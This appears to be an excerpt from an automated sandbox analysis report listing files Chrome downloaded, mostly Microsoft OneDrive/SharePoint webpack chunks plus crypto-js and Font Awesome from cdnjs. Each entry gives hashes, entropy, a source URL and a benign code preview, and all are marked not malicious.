                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{788:e=>{e.exports=JSON.parse('{"a":"D.sol.... Nous avons rencontr. un probl.me.","c":"Essayez d.actualiser la page.","b":"D.sol.... Nous n.avons pas pu r.cup.rer la page . afficher."}')}.,1640:e=>{e.exports=JSON.parse('{"a":"Ouvrir dans le lecteur immersif"}')}.,277:e=>{e.exports=JSON.parse('{"b":"Ajouter un raccourci . Mes fichiers","d":"Ajouter un raccourci . OneDrive","n":"Supprimer","p":"Supprimer le raccourci de Mes fichiers","y":"Supprimer de la liste partag.e","a":"Ajouter un raccourci vers ce dossier dans Mes fichiers","o":"Supprimer le raccourci vers ce dossier de Mes fichiers","c":"Ajouter un raccourci vers ce dossier dans OneDrive","m":"Supprimer le raccourci s.lectionn. de cet emplacement","f":"Ajouter un raccourci . un albums","e":"Ajouter un raccourci . cet album partag. dans les albums","k":"Ouvrir l.emplacement du fichier","t":"Date","s":"N.importe que
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (41446)
                              Category:downloaded
                              Size (bytes):59868
                              Entropy (8bit):5.319171081356945
                              Encrypted:false
                              SSDEEP:
                              MD5:918B885C5BFA66DA7C9118DBD0588982
                              SHA1:5FA4703E8FAAF44A536D6130C4AD8F8AE2D2AC42
                              SHA-256:0DA936C0703B0579D96D2214D177EFEE77A08E2EFBF9F32ED2638BEA68AF76FD
                              SHA-512:61BB2387C695DA1072ADBE6B3DDC4944E101BE961E11C166E5BCEBC6FB6F225A9E0DC4AD9843AEC92C2A126D1DF4A38B5137A8D02B96E7DC764E6CFC1FE27B6B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/35.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[35],{6350:function(e,t,n){n.d(t,{a:function(){return q},b:function(){return fe}});var a=n("tslib_102"),i=n(23),r=n(2182),o=n(150),s=n(14),c=n(492),d=n(1226),l=n(4632),u=n(112),f=n("odsp.util_578"),p=n(42),m=n(48),_=n(3849),h=n(4629),b=n(54),g=n(174),v=n(2519),y=n(2441),S=n(6351),D=n(3848),I=n(66),x="OnChangingTags";function C(e,t){void 0===t&&(t=1);try{for(var n=e.fields.length,a=0;a<n;a++)if("TaxonomyFieldType"===e.fields[a].schema.FieldType||"TaxonomyFieldTypeMulti"===e.fields[a].schema.FieldType){var i=O(e.fields[a].serverData,e.fields[a].data);if(0===i.addedTagsCount&&0===i.deletedTagsCount)continue;var r=e.fields[a].schema.FieldType.toLowerCase();e.isBulkEdit||t>1?r+=".BulkEdit.":r+=".NotBulkEdit.",r+=x;for(var o=0;o<t;o++)p.a.logData({name:r,isIntentional:!0,extraData:{deletedTagsCount:i.deletedTagsCount,addedTagsCount:i.addedTagsCount}})}}catch(e){return void I.a.logError(e,{eventName:x})}}function O(e
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (47992), with no line terminators
                              Category:downloaded
                              Size (bytes):47992
                              Entropy (8bit):5.605846858683577
                              Encrypted:false
                              SSDEEP:
                              MD5:CF3402D7483B127DED4069D651EA4A22
                              SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                              SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                              SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                              Malicious:false
                              Reputation:unknown
                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (10761)
                              Category:downloaded
                              Size (bytes):113713
                              Entropy (8bit):5.336994192268454
                              Encrypted:false
                              SSDEEP:
                              MD5:454E29AE23FE81783CC2CDBC755D8248
                              SHA1:AC2CEDF4392A33C9F6A95DCD9C77C0A8F2EC234E
                              SHA-256:C88920D90FD4D25AC7AF5C45904FE50BF76642C18273783300FB1C8444783987
                              SHA-512:335B3A90F3AFCDDFD7D64BE3A8C21159AD2390111781444F0C237D4481F5025C36B32974231485B0538B295989B4171A3EFAF722C392F89055879DC48709939D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/40.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[40,81,39,206,216],{1561:(e,t,n)=>{n.d(t,{a:()=>s,b:()=>c});var a=n("odsp.util_578"),i={ODB:751},r={ODB:1697};function o(){return a.tH.isFeatureEnabled(i)}function s(e){var t;return a.tH.isFeatureEnabled(r)?o()?a.HW.isActivated("44C25B23-9A3B-48B4-B331-B1E8A69C1920","09/07/2023","Updated tip1 PowerAutomate URLs")?"https://make.test.powerautomate.com":"https://make.preprod.powerautomate.com":(t=e&&e.farmSettings&&e.farmSettings.ExternalService_powerautomatemakehostname)?"https://".concat(t):"https://make.powerautomate.com":o()?"https://tip1.flow.microsoft.com":(t=e&&e.farmSettings&&e.farmSettings.ExternalService_flowhostname)?"https://".concat(t):"https://flow.microsoft.com"}function c(e,t,n){return t?"".concat(s(n),"/environments/").concat(e,"/solutions/").concat(t):"".concat(s(n),"/environments/").concat(e,"/flows")}}.,1082:(e,t,n)=>{n.d(t,{a:()=>c});var a=n(503),i=n("odsp.util_578"),r=n(278),o=["AppendOnly",
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (11289)
                              Category:downloaded
                              Size (bytes):518992
                              Entropy (8bit):5.044269217193591
                              Encrypted:false
                              SSDEEP:
                              MD5:580A5ADB51F5D13CE9CB0CEC91251D6B
                              SHA1:05C5F70CBCF816A2E89391DDDAB04752E9870529
                              SHA-256:E9AEB02E17C23AE96340EB1341E68A208878CE5FA2A371C5CDA9386AB2036D27
                              SHA-512:3A338173B98472CE9D05D807286B10531368DD37ADFB99955111E391AC77BC65CD9E74704A6A5034D09391632FA2C0793EA8AA1A7D3F5494EC2E3ACD9A0355D3
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-meta-os/en-us/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6473:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7237:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (528)
                              Category:downloaded
                              Size (bytes):1245
                              Entropy (8bit):5.641477845383677
                              Encrypted:false
                              SSDEEP:
                              MD5:D148AF4CD1894689BC881F7BC91CB479
                              SHA1:C3D6BD5455EF4B81801906F9C175452A23DC575E
                              SHA-256:933469E202A1B7528BDE1E501B751523C17F18D8F26F93BCD788D1040DF5648C
                              SHA-512:4CBD5B09447CCBC01381C8AA12D382C1084001F1305692902EB76A990BC97E6D0322E1AF587ACC5549C056AB3B2420424E1F8BF571D801EC31E2A73020B0BC94
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/ja/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{393:e=>{e.exports=JSON.parse('{"a":"Microsoft ..........."}')}.,315:e=>{e.exports=JSON.parse('{"a":"......."}')}.,386:e=>{e.exports=JSON.parse('{"a":"........"}')}.,387:e=>{e.exports=JSON.parse('{"a":"......","b":".... .... (.....)","c":".... ....","d":".....","j":"........","k":"......","r":"........","s":"... .....","w":".....","u":"..........","t":".....","i":".. ......","m":"...","p":"...","q":"......","h":"...","v":"... ....","f":"..... .......","x":"... .........","l":"OneDrive ...","o":"OneDrive .....","g":"... Microsoft 365 .......
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5422)
                              Category:downloaded
                              Size (bytes):20817
                              Entropy (8bit):5.167054797059205
                              Encrypted:false
                              SSDEEP:
                              MD5:4FC3A16CE716C168DC910E7F9FBD14A2
                              SHA1:8406B14BD98EFA1785037F7FF682633F6E1956FD
                              SHA-256:7AE1A372860DB03B2A434C17B25473D84B6386724C10683BABDE120D9726E1DD
                              SHA-512:FD059B638DE43BA48B41F626020AD5A83782DA54434C7618105571816AAE952B1866058A4731058BDCD4F1572C2782E8360264D3C44B25CD4C87F453EE3C5556
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/528.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[528],{3319:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return a},c:function(){return o},d:function(){return r}});var a=function(e,t,n,a){return i(e,t,n)+(a+"\r\n")},i=function(e,t,n){var a="--"+e+"\r\n";return(a+="Content-ID: "+t+"\r\n")+"Content-Type: "+n+"\r\n\r\n"},r=function(e,t,n){var a="--"+e+"\r\n";return(a+="Content-Type: "+t+"\r\n")+"Content-Transfer-Encoding: "+n+"\r\n\r\n"},o=function(e,t,n,a,i){var r=n+" "+a+" HTTP/1.1\r\n";return r+="Content-Type: "+e+"\r\n",r+="Accept: "+t+"\r\n",i&&(r+="Content-Length: "+i+"\r\n\r\n"),r}}.,4941:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return i},c:function(){return c}});var a,i,r=n("tslib_102"),o=n(42),s=n(14);!function(e){e.AddAnnotation="OneUpUniversalAnnotation.AddAnnotation",e.DeleteAnnotation="OneUpUniversalAnnotation.DeleteAnnotation",e.Enter="OneUpUniversalAnnotation.EnterUniversalAnnotation",e.Exit="OneUpUniversalAnnotati
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2917)
                              Category:downloaded
                              Size (bytes):2922
                              Entropy (8bit):4.800382260934221
                              Encrypted:false
                              SSDEEP:
                              MD5:405B17A254DF6A29A6EF6F474EFFE3F9
                              SHA1:D649F10CFE2A88D89D50B4022B9762E6F2FF9B0F
                              SHA-256:3A5393152372CAEA502E49B15EF5255805575F1F9DAC39974CEC257210401B2D
                              SHA-512:A4D1A49E6644F0E4ECE364005E996D194E8B7C02796C4780EC7D04EE4408DF9C4FB593D57E37F9F90BF21B1C697B6CCFE987134452B3508363431EA0BA45984D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/63481.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[63481],{63481:(e,t,n)=>{n.d(t,{Bv_:()=>c,By7:()=>s,Kwi:()=>u,LL4:()=>p,M3S:()=>f,Yqf:()=>d,eMm:()=>h,gKk:()=>m,gXG:()=>i,ksq:()=>r,liP:()=>_,nai:()=>l,wGp:()=>o});var a=n(109785);const i=(0,a.k)("Checkmark12Filled","12",["M9.76 3.2c.3.29.32.76.04 1.06l-4.25 4.5a.75.75 0 0 1-1.08.02L2.22 6.53a.75.75 0 0 1 1.06-1.06l1.7 1.7L8.7 3.24a.75.75 0 0 1 1.06-.04Z"]),r=(0,a.k)("Checkmark16Filled","16",["M14.05 3.49c.28.3.27.77-.04 1.06l-7.93 7.47A.85.85 0 0 1 4.9 12L2.22 9.28a.75.75 0 1 1 1.06-1.06l2.24 2.27 7.47-7.04a.75.75 0 0 1 1.06.04Z"]),o=(0,a.k)("CheckmarkCircle12Filled","12",["M1 6a5 5 0 1 1 10 0A5 5 0 0 1 1 6Zm7.35-.9a.5.5 0 1 0-.7-.7L5.5 6.54 4.35 5.4a.5.5 0 1 0-.7.7l1.5 1.5c.2.2.5.2.7 0l2.5-2.5Z"]),s=(0,a.k)("ChevronDoubleDown20Regular","20",["M15.85 8.65c.2.2.2.5 0 .7l-5.46 5.49a.55.55 0 0 1-.78 0L4.15 9.35a.5.5 0 1 1 .7-.7L10 13.8l5.15-5.16c.2-.2.5-.2.7 0Zm0-4c.2.2.2.5 0 .7l-5.46 5.49a.55.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (22056)
                              Category:downloaded
                              Size (bytes):67956
                              Entropy (8bit):5.068116742967019
                              Encrypted:false
                              SSDEEP:
                              MD5:E88A1B3CDBE3C6CE65E53332DF892881
                              SHA1:818E72506816CF205C160C208D9CA40639AAA6DB
                              SHA-256:FA0AB868B8617F233D8FFED335B595A1428A4AAB0FEA1587347C9A64051D8397
                              SHA-512:88BF0C4EEF3922256EE86D72758147C0886700C52B4FA243B90C51245CD9A5373E302D0068CE59CF3A40306312168408F7FA69D996012C62EB9E1A1B9D90C61B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/fr/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{3394:e=>{e.exports=JSON.parse('{"a":"D.sol.... Nous avons rencontr. un probl.me."}')}.,3818:e=>{e.exports=JSON.parse('{"a":"Ouvrir dans le lecteur immersif"}')}.,3434:e=>{e.exports=JSON.parse('{"b":"Ajouter un raccourci . Mes fichiers","d":"Ajouter un raccourci . OneDrive","n":"Supprimer","p":"Supprimer le raccourci de Mes fichiers","y":"Supprimer de la liste partag.e","a":"Ajouter un raccourci vers ce dossier dans Mes fichiers","o":"Supprimer le raccourci vers ce dossier de Mes fichiers","c":"Ajouter un raccourci vers ce dossier dans OneDrive","m":"Supprimer le raccourci s.lectionn. de cet emplacement","f":"Ajouter un raccourci . un albums","e":"Ajouter un raccourci . cet album partag. dans les albums","k":"Ouvrir l.emplacement du fichier","t":"Date","s":"N.importe quelle date","u":"Derni.res 24 heures","w":"Semaine derni.re","v":"Mois dernier","x":"Ann.e derni.re","l":"
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8766)
                              Category:downloaded
                              Size (bytes):10190
                              Entropy (8bit):5.664187643532809
                              Encrypted:false
                              SSDEEP:
                              MD5:9963273A9AD1532CF6C9711D4263370B
                              SHA1:A927CBD827B4049CBAAEB2BBE37A6D6E8250732C
                              SHA-256:7A17E40AE3A5C5DD4CEFADE37EEE2BC0AFD03A7EFEFDC5C47AF754ADAC02C066
                              SHA-512:EB4EF522E5045E5F90EAB04453B39FED44103B9C8675D1F8A11FCDEA1B1BE41DDC9C16ADFF091B91BFB4BBFA691FAB2B2D86F6987586362FF69B02292C1D930B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/48.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[48],{6597:function(e,t,n){var a;function i(){return a||"function"!=typeof BroadcastChannel||(a=new BroadcastChannel("sw_broadcast")),a}n.d(t,{a:function(){return o},b:function(){return r},c:function(){return i}});var r={Sync:"Sync",Installed:"Installed"},o={OfflineNotification:"OfflineNotification",CheckOffline:"CheckOffline",ServiceWorkerRegistered:"ServiceWorkerRegistered",ScriptSynced:"ScriptSynced"}}.,6596:function(e,t,n){n.d(t,{a:function(){return c}});var a=n("tslib_102"),i=n("odsp.util_578"),r={FluentUIV9ShimOverallControl:60077,FluentUIV9ShimDefaultButton:60337,FluentUIV9ShimPrimaryButton:60344,FluentUIV9ShimIconButton:60355,FluentUIV9ShimActionButton:60356,FluentUIV9ShimImage:60357,FluentUIV9ShimToggle:60461,FluentUIV9ShimCommandBarButton:60466,FluentUIV9ShimCommandBar:60480,FluentUIV9ShimCommandButton:60501,FluentUIV9ShimTooltipHost:60634,FluentUIV9ShimTooltip:60633,FluentUIV9ShimLink:60405,FluentUI
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:troff or preprocessor input, ASCII text, with very long lines (372)
                              Category:downloaded
                              Size (bytes):37414
                              Entropy (8bit):4.82325822639402
                              Encrypted:false
                              SSDEEP:
                              MD5:C495654869785BC3DF60216616814AD1
                              SHA1:0140952C64E3F2B74EF64E050F2FE86EAB6624C8
                              SHA-256:36E0A7E08BEE65774168528938072C536437669C1B7458AC77976EC788E4439C
                              SHA-512:E40F27C1D30E5AB4B3DB47C3B2373381489D50147C9623D853E5B299364FD65998F46E8E73B1E566FD79E97AA7B20354CD3C8C79F15372C147FED9C913FFB106
                              Malicious:false
                              Reputation:unknown
                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css
                              Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */./* FONT PATH. * -------------------------- */.@font-face {. font-family: 'FontAwesome';. src: url('../fonts/fontawesome-webfont.eot?v=4.7.0');. src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');. font-weight: normal;. font-style: normal;.}..fa {. display: inline-block;. font: normal normal normal 14px/1 FontAwesome;. font-size: inherit;. text-rendering: auto;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./* makes the font 33% larger relative to the icon container */..
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65301)
                              Category:downloaded
                              Size (bytes):130604
                              Entropy (8bit):5.224052234183506
                              Encrypted:false
                              SSDEEP:
                              MD5:B6747B0C3E4802C5D936B2F4E8BDD0C7
                              SHA1:EAD1864EF895A0EA8C8ACC5CAAAE272039E1FAFB
                              SHA-256:2084072D22E972EF39BBBAD9B45A785F41DE054D55FAE8663226E58CF3118E24
                              SHA-512:22582F3418C0D496AC5141DFD9218A80DE8BA300F0472CFB0EA8CC2A4EAE5085B85C070D452EA913E5DDCB55B37845D5C49B80957DF63ACFD29BA2C388389E08
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/48591.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[48591],{751265:(e,t,n)=>{var a;n.d(t,{P:()=>a}),function(e){e.Horizontal="Horizontal",e.Vertical="Vertical",e.Longer="Longer"}(a||(a={}))}.,748591:(e,t,n)=>{n.d(t,{C:()=>ue});var a=n(295610),i=n(751265),r=n(243727),o=n(82999),s=n(607539),c=n(531344),d=n(551638),l=n(460177),u=n(287615),f=n(124825),p=new Map([["UNSUPPORTED_SCHEME",!1],["TIMEOUT",!1],["HTTP_ERROR",!1],["MALFORMED_DATA_URI",!1],["INVALID_TEXT_HEADER",!1],["INVALID_TEXT_CUE ",!1],["UNABLE_TO_DETECT_ENCODING",!1],["BAD_ENCODING",!1],["TEXT_COULD_NOT_GUESS_MIME_TYPE",!0],["MISSING_TEXT_PLUGIN",!0],["BUFFER_READ_OUT_OF_BOUNDS",!1],["JS_INTEGER_OVERFLOW",!1],["EBML_OVERFLOW",!1],["EBML_BAD_FLOATING_POINT_SIZE",!1],["MP4_SIDX_WRONG_BOX_TYPE",!1],["MP4_SIDX_INVALID_TIMESCALE",!1],["MP4_SIDX_TYPE_NOT_SUPPORTED",!1],["WEBM_CUES_ELEMENT_MISSING",!1],["WEBM_EBML_HEADER_ELEMENT_MISSING",!1],["WEBM_SEGMENT_ELEMENT_MISSING",!1],["WEBM_INFO_EL
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (13295)
                              Category:downloaded
                              Size (bytes):557031
                              Entropy (8bit):5.086641113063828
                              Encrypted:false
                              SSDEEP:
                              MD5:5CAB6AC36EDD1FD3823A717467F95C8C
                              SHA1:6F9A56078E1B46DC977433247D997FEBC73880B5
                              SHA-256:862A66F0FFC2FDF546CBDA952A09B1471B8C8AB8C842A1DCF50407752B850133
                              SHA-512:DB28E09FC04052760621F02EAF2305E7F7924EC1065E0773440A3AE8B303BAB2869012866D98A144BFAFFEB3E60022A92C111C5B82221C7A67355CF7FDFC206D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/de/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6474:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7214:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (37337)
                              Category:downloaded
                              Size (bytes):51802
                              Entropy (8bit):5.415322401529623
                              Encrypted:false
                              SSDEEP:
                              MD5:E3639647310C576D0B9C15691BE1CD03
                              SHA1:B9437F13313E77D333B5CA72E41F1F6A51BBF83B
                              SHA-256:F1BDF87925A86C883ABB6FDE94BEE32B44C22F17A398ABFF45D98968025124E8
                              SHA-512:DD2D02EEE8A90A4D9352433AEE6BD0F9A6BA294916B13C7572C24F566599D057DAA036947A1C5494C26707E141578D5EDC263A1772306BEF45272047A87B4C16
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1035.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1035],{4656:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_102"),i=n(1333),r=n(136),o=n("odsp.util_578"),s=o.HW.isActivated("015cda7c-3a85-42a2-85fa-84fc4a06407b","1/24/24","Adds customer promises to approvals QOS events"),c=o.HW.isActivated("fc61b251-626f-4f13-ae02-1915edbb6af0","2/1/24","Adds viewId to the enable and disable methods of the Approvals API"),d=function(e){function t(t){var n=e.call(this,{dataSourceName:"approvals"},{pageContext:t})||this;return n._apiUrlHelper=new r.b({webAbsoluteUrl:t.webAbsoluteUrl}),n}return(0,a.XJ)(t,e),t.prototype.enable=function(e,t,n){var a=this._apiUrlHelper.build().segment("SP.Approvals.Enable").toString();return this.dataRequestor.getData({url:a,method:"POST",qosName:"SPListApprovals.Enable",customerPromise:s?void 0:{pillar:"Edit",veto:function(e){return"Approvals: Enable approvals failure"}},additionalPostData:c?JSON.stringify({listId:e,addFieldsToDe
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (18788)
                              Category:downloaded
                              Size (bytes):52832
                              Entropy (8bit):5.003694979588261
                              Encrypted:false
                              SSDEEP:
                              MD5:CF6B06155D35F909E90CF64822623CCE
                              SHA1:FA77ADE88E2ACB4994D38A6B6B92050241882C4C
                              SHA-256:58D6336614A6125BDE39B1CD8AE4E697D55403F3E992BBF1954A61405BA69BC1
                              SHA-512:6D604B719A6740B5ED2DED765B8E518E03317D91D85B95B75D55228A45E62DB933F64735E416A1CBC4B44F64BB921A226A197A073543D9A1A0757657EA22F5FF
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/en-us/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{586:e=>{e.exports=JSON.parse('{"a":"Something went wrong","c":"Try refreshing the page","b":"Something went wrong and we couldn\\u0027t get the page to display."}')}.,1612:e=>{e.exports=JSON.parse('{"a":"Open in Immersive Reader"}')}.,696:e=>{e.exports=JSON.parse('{"b":"Add shortcut to My files","d":"Add shortcut to OneDrive","n":"Remove","p":"Remove shortcut from My files","y":"Remove from shared list","a":"Add a shortcut to this folder in My files","o":"Remove the shortcut to this folder from My files","c":"Add a shortcut to this folder in OneDrive","m":"Remove the selected shortcut from this location","f":"Add shortcut to Albums","e":"Add a shortcut to this shared album in albums","k":"Open file location","t":"Date","s":"Any date","u":"Last 24 hours","w":"Last week","v":"Last month","x":"Last year","l":"Photos","r":"Type","g":"Any Type","i":"Folders","h":"Documents","j":"Music","q":"PC Syn
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1148)
                              Category:downloaded
                              Size (bytes):2438
                              Entropy (8bit):5.252727456208638
                              Encrypted:false
                              SSDEEP:
                              MD5:4B856796D44E3C59D6E8E6ACC7FC15D7
                              SHA1:448736C0BAD2C582D0E1CE6BD647AFD34352CA6C
                              SHA-256:56182528D6AB80051BF756F673B3BE0558D06249FB94714EBE17A6FE60D89A19
                              SHA-512:BA554C05F6763CDA392230AA8F19C1C2C1F70E0C0458103778F0961DD906CD33C72FBCAB3E41384EC23C8A74B28CCF8B661640202E962502481875BA90795748
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1028.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1028],{3989:function(e,t,n){n.d(t,{a:function(){return a}});var a=function(e){return e.selected?{colorCell:{border:0,padding:0,margin:"6px",boxShadow:"0 0 0 2px ".concat(e.theme.palette.white,", 0 0 0 4px ").concat(e.theme.palette.blue),"&:hover::before":{boxShadow:0},"&:hover::after":{boxShadow:0},"&:focus":{border:0,padding:0},"&:focus:hover":{padding:0},".ms-Fabric--isFocusVisible &:focus::after":{border:0},"@media screen and (-ms-high-contrast: active), (forced-colors: active)":{forcedColorAdjust:"none",color:"HighlightText",backgroundColor:"Highlight"}}}:{colorCell:{margin:"6px","&:hover":{boxShadow:"0 0 0 2px ".concat(e.theme.palette.white,", 0 0 0 4px ").concat(e.theme.palette.neutralSecondary),border:0,padding:0},"&:focus":{boxShadow:"0 0 0 2px ".concat(e.theme.palette.white,", 0 0 0 4px ").concat(e.theme.palette.neutralSecondary),border:0,padding:0},"&:hover::before":{boxShadow:0},"&:hover::after":{b
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (49571)
                              Category:downloaded
                              Size (bytes):142469
                              Entropy (8bit):5.271045386572237
                              Encrypted:false
                              SSDEEP:
                              MD5:98BDDD8E1C0F300C6D971B2533B77CD3
                              SHA1:00F9B895455006FF6B4F69FFD8587A9E34D6E384
                              SHA-256:F363893DDA0EE13A81E4170D5C643C5F0DCE6AC5B732C2B814544B27E41429E8
